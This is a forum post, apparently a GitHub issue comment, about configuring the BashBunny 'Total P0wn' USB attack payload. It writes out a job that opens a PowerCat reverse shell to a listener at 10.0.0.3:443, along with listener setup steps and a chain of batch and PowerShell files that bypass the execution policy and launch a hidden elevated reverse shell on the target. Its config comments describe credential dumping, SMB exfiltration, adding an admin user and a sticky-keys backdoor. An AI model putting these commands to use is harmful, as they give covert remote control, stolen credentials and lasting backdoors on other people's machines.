This is a great idea to combine multiple payloads into one. I'm really interested in getting PowerCat working and I've seen how you're using it in joblist3.json. It's almost working for me, but the PowerCat connection disconnects immediately after being connected. I'm wondering if the process is killed after all the jobs finish running instead of keeping powercat alive in the background. Also for anyone else wanting to learn PowerCat I think it's worth adding to your documentation how to set up the listener. Let me try to help add to some of your documentation.
For now I've created my own joblist4.json like this,
[{
"jobName" :"PowerCat",
"command" :"Connect-Powercat -Mode TCP -RemoteIP \"10.0.0.3\" -Port 443 -Execute -KeepAlive",
"runType" :"process",
"scriptName":"Connect-PowerCat2.ps1"
}]
Note: For everyone following along the RemoteIp is the PowerCat listener which is waiting for a SHELL connection to be established. Essentially you get a remote powershell. A shell is just one of the many functions of PowerCat, apparently you can transfer files as well. See documentation here https://github.com/secabstraction/PowerCat
For documentation purposes I'll show the other files I configured. Here's the jobselectect.txt
#!/bin/bash
# Job config selector file. Use this file to export the base config for your
# batch job. Config file template is located in templates/payload_config_template.txt
# Example configs are included in the configs folder of this project.
# Default test config payload
#source $PAYLOADFOLDER/configs/bbtpsdefault.txt
# TotalP0wn Payload config
source $PAYLOADFOLDER/configs/totalp_config.txt
Here's the totalp_config.txt
#!/bin/bash
#Default configuration file for BBTPS.
#You can use this file as a template, do not leave any settings out or
#You will get errors.
# Bunny root loot folder name.
export ROOTFOLDERNAME="bbtps"
# Folder where scripts live.
export JOBFOLDER="$PAYLOADFOLDER/jobs/totalp0wn"
#########################################################################
# BELOW UNCOMMENT ONE OF THE JOBLIST YOU WANT TO RUN FROM THE TOTAL P0WN GROUP. DESCRIPTIONS ARE LISTED ABOVE EACH.
# Job runlist json file.
# Joblist1 runs Get-VaultCredentials, Invoke-Mimidogz, Invoke-PowerDump and Invoke-AddAdminUser.
# If not ran as admin then only VaultCredentials will return anything if anything present.
#export JOBLIST="$JOBFOLDER/joblist1.json"
# Joblist2 will always Get-VaultCredentials and Invoke-SMBExfil. It will run Invoke-AdminJobs to check for admin and if
# it is running as UACbypassed Admin it will call back to the server to queue up to be delivered and ran: Mimidogz, PowerDump,
# and AddAdminUser.
#export JOBLIST="$JOBFOLDER/joblist2.json"
# Joblist3 is the signature Total P0wn job load. When ran as non-admin the following scripts will run:
# VaultCredentials, Powercat (Powershell Netcat, requires another machine running Powercat or NCat), SMBExfil.
# If ran as admin then the AddAdminJobsTP will test true to UACBypassed admin and queue up the following jobs:
# Mimidogz, PowerDump, AddAdminUser and SethcBD (Sets a local backdoor for even locked machines when you hit SHIFT
# 5 times will get a UACBypassed System level cmd prompt from logon screen and even lock screen.)
#export JOBLIST="$JOBFOLDER/joblist3.json"
# Joblist4 is my own custom job.
export JOBLIST="$JOBFOLDER/joblist4.json"
#########################################################################
# Do you want the stager to run as admin, 1 for yes, 0 for no.
export GETADMIN=1
# ATTACKMODE TYPES
# 0 = SINGLE/ 1 = DUAL
export ATMODE=1
# Enable/Disable debug. 1 for on, 0 for off.
export DEBUG=1
# First Quack Delay, after running initial command from run prompt.
export Q_DELAY1=3000
# Second Quack Delay, if getting admin then this is ran after selecting Yes.
export Q_DELAY2=3000
Note: I changed to my custom joblist4.json, ATMODE=1, DEBUG=1, and the delays to 3 seconds from the original.
That's basically it for the BB. Now for the listener, I had to download the PowerCat source files from https://github.com/secabstraction/PowerCat and I placed them on my windows machine at $env:userprofile\Documents\WindowsPowerShell\Modules\PowerCat
I discovered that powershell likes to store modules in this folder $env:userprofile\Documents\WindowsPowerShell\Modules. Also you can run this command in powershell,
echo $Env:PSModulePath
to see where modules go in powershell. Just make sure the PowerCat.psd1 is directly under the path: $env:userprofile\Documents\WindowsPowerShell\Modules\PowerCat\PowerCat.psd1
Then I had to change my execution policy in order to Import the PowerCat module. So in powershell change the Execution Policy with this command,
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
Press "Y" and [Enter] when prompted. Now import the powercat module with this command,
Import-Module PowerCat
Note: If this fails you can also import the PowerCat.psd1 file directly by navigation to it and Import-Module PowerCat.psd1. It's just nicer to have powercat in a working modules folder so it can be imported anytime.
Now finally to set up the listener to wait for our target machine, I issued the powershell command,
Start-PowerCat -Mode TCP -Port 443 -KeepAlive
Note: The port 443 matches the port used in joblist4.json. It can be any open port they just have to match. The KeepAlive parameter is supposed to re-connected WHEN (not if) the connection is lost. Which times out after 60 seconds by default anyways.
So my problem is the BBTPS doesn't stay connected on the target machine. Sorry I know this is a lot to process but basically this is is the goal,
Basic Shell Connection
=-=-=-=-=-=-=-=-=-=-=-=-=
Set Up Listener
> Start-PowerCat -Port 443 -KeepAlive
Send PowerShell on Target Machine --> Listener Machine
> Connect-PowerCat -RemoteIp <ListenerPC Ip> -Port 443 -Execute
I set up a reverse shell and it works great when I tested the commands manually. So as far as BBTPS I guess my next attempt is to try and copy the PowerCat shell script over to the target machine and just trigger it to run before disconnecting the BashBunny. Similar to how the USB_Intruder Payload works by copying scripts from the BB --> %WinDir%\ProgData\ and then the BashBunny triggers the script to run by,
# PayLoad on BB
Q STRING powershell -WindowStyle Hidden \$Env:WinDir\ProgData\shell.bat
Q ENTER
before the BB payload is completed. I would change the shell.bat to look like this,
# File: $Env:WinDir\ProgData\shell.bat
@echo off
call %windir%\ProgData\revshell-PowerCat2.bat
and the revshell-PowerCat2.bat would look like this,
# File: $Env:WinDir/ProgData/revshell-PowerCat2.bat
@ECHO OFF
PowerShell.exe -Command "& {Start-Process PowerShell.exe -ArgumentList '-ExecutionPolicy Bypass -File ""%~dpn0.ps1""' -Verb RunAs}"
BOOM! Now we have a hidden powershell process running in the background. For anyone that didn't know how to do that. The string -File ""%~dpn0.ps1""' would translate into -File ""revshell-PowerCat2.ps1""' which comes from the file name of the .bat file called in the shell.bat. Then finally the trick would be writing the revshell-PowerCat2.ps1 file. We still have to import the PowerCat module and issue the "Connect-Powercat" command. So I would try something like this,
# File: $Env:WinDir/ProgData/revshell-PowerCat2.ps1
Start-Process -WindowStyle hidden -FilePath "$Env:WinDir\ProgData\Connect-Powercat2.ps1" -ArgumentList "Connect-Powercat -Mode TCP -RemoteIP \"10.0.0.3\" -Port 443 -Execute -KeepAlive"
....maybe. I don't know if this will work. I'll give it a try and update this thread on my results.
